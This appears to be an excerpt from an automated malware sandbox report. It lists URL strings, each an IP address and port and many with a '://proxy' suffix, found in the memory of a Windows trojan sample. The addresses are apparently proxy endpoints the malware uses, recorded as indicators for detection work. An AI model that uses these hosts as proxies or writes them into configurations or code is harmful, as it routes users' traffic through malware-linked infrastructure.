                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.247.104.237:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.68.189.22:54643
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.68.189.22:54643://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.69.0.179:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C790E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.69.0.179:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.73.184.94:23500
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.73.184.94:23500://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.74.35.219:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.74.35.219:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.87.130.6:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.87.130.6:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.92.133.194:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.92.133.194:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.12.211.140
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.12.211.140://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.138.97.59:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.138.97.59:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.164.132.234:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.164.132.234:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.235.249.152:25566
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.235.249.152:25566://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.235.250.155:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.235.250.155:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C950C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.34.166.179:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.34.166.179:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.34.3.229:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.34.3.229:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75CB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.42.189.209:2080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.42.189.209:2080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD5F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.45.156.46:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.45.156.46:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.74.196.242:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.74.196.242:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.76.129.30:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.76.129.30:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.149.50:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.149.50:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.232.174:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.232.174:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.236.235:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.236.235:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.242.27:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.77.242.27:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C94CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.138.125:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.138.125:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.141.206:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.141.206:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.141.206:4145x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.141.77:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.141.77:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.141.80:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.141.80:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.152.246:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.152.246:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76ED000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.186.153:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.186.153:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.81.107:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.81.107:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.78.81.107:8080x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.93.231.73:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://110.93.231.73:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.16.50.12:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.16.50.12:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.206.0.99:8181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.206.0.99:8181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.11.13:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.11.13:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.11.28:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.11.28:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.11.67:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.11.67:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.213.165:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.213.165:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.213.192:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.224.213.192:8089://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.162:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.162:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.201:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.201:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.243:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.243:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.29:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.29:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.38:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.38:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.55:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.55:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.74:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.152.74:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.107:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.107:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.122:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.122:8089P
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.129:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.129:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.146:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.146:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.157:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.157:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.166:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C846E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.225.153.166:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.3.102.135:30001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.3.102.135:30001://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.68.127.170:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.68.127.170:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8489000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.68.31.130:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.68.31.130:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.68.31.134:40385
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.68.31.134:40385://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC72000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.88.240.43:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.88.240.43:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.93.235.76
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.93.235.76://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://111.93.235.76:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.109.16.51:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.109.16.51:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9096000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.109.20.234:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9096000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.109.20.234:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.133.192.231:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.133.192.231:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.197.3.200:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.197.3.200:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.198.130.51:8082
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.198.130.51:8082://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6735000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C815E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.205.92.14:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C815E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.205.92.14:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.30.155.83:12792
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.30.155.83:12792://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.5.33.179:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.5.33.179:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.131.6:8080
